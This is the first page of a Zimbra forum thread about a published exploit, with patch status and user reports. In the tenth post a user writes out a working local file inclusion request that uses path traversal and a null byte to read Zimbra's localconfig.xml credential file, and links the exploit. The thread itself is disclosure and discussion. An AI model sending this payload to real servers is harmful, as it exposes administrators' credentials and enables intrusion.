Page 1 of 4 123 ... LastLast
Results 1 to 10 of 38

Thread: zimbra 0-day

  1. #1
    maumar is offline Elite Member
    Join Date
    Mar 2007
    Location
    Small village in the center of Italy
    Posts
    348
    Rep Power
    8

    Default zimbra 0-day

    It was published on Exploits Database by Offensive Security, I suppose you are aware of it, in this case sorry

  2. #2
    phoenix is online now Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,504
    Rep Power
    57

    Default

    Quote Originally Posted by maumar View Post
    It was published on Exploits Database by Offensive Security, I suppose you are aware of it, in this case sorry
    Please file this in bugzilla.
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  3. #3
    MKC
    MKC is offline Member
    Join Date
    Feb 2011
    Posts
    10
    Rep Power
    4

    Default

    If anybody's interested, I've analyzed the bug and developed an independent fix for it.
    I've posted everything on my blog, which sadly is in French.

    I haven't taken the time to translate all this, but if some users or people working on Zimbra want to know more about what I did, just get in touch with me

  4. #4
    quanah is offline Zimbra Employee
    Join Date
    May 2007
    Location
    Zimbra
    Posts
    1,271
    Rep Power
    10

    Default

    Hi,

    Thank you for sharing your research. These issues were resolved with a patch for our 7.2.2 and 8.0.2 and subsequent releases in February of 2013.

    --Quanah
    Quanah Gibson-Mount
    Server Architect
    Zimbra, Inc
    --------------------
    Zimbra :: the leader in open source messaging and collaboration

  5. #5
    MKC
    MKC is offline Member
    Join Date
    Feb 2011
    Posts
    10
    Rep Power
    4

    Default

    The exploit was advertised as a 0day, and I took the author's word for it.
    I feel silly now, sorry about this!

  6. #6
    dik23 is offline Advanced Member
    Join Date
    Dec 2010
    Location
    UK
    Posts
    227
    Rep Power
    4

    Default

    Better a false alarm than no alarm

  7. #7
    anndro is offline Starter Member
    Join Date
    Dec 2013
    Posts
    2
    Rep Power
    1

    Default

    I updated my zimbra to 8.0.5 but exploid still working. Here is some quick fix for protection in Turkish but i think it can help,

    http://www.bilgiguvenligi.gov.tr/kri...l-aciklik.html

  8. #8
    phoenix is online now Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,504
    Rep Power
    57

    Default

    Quote Originally Posted by anndro View Post
    I updated my zimbra to 8.0.5 but exploid still working. Here is some quick fix for protection in Turkish but i think it can help,
    If you think this exploit still exists then file a report in bugzilla.
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  9. #9
    dik23 is offline Advanced Member
    Join Date
    Dec 2010
    Location
    UK
    Posts
    227
    Rep Power
    4

    Default

    Please could you post the big here so I can subscribe to it?

    Thanks

  10. #10
    expert_az is offline Active Member
    Join Date
    Nov 2007
    Posts
    25
    Rep Power
    7

    Default

    I can confirm ,LFI working on last 8.0.5 and after 7.2.2

    LFI is located at :
    /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx %20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

    http://www.exploit-db.com/exploits/30085/
    $zmcontrol -v
    Release 8.0.5_GA_5839.RHEL6_64_20130910123908 RHEL6_64 FOSS edition.

Page 1 of 4 123 ... LastLast

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •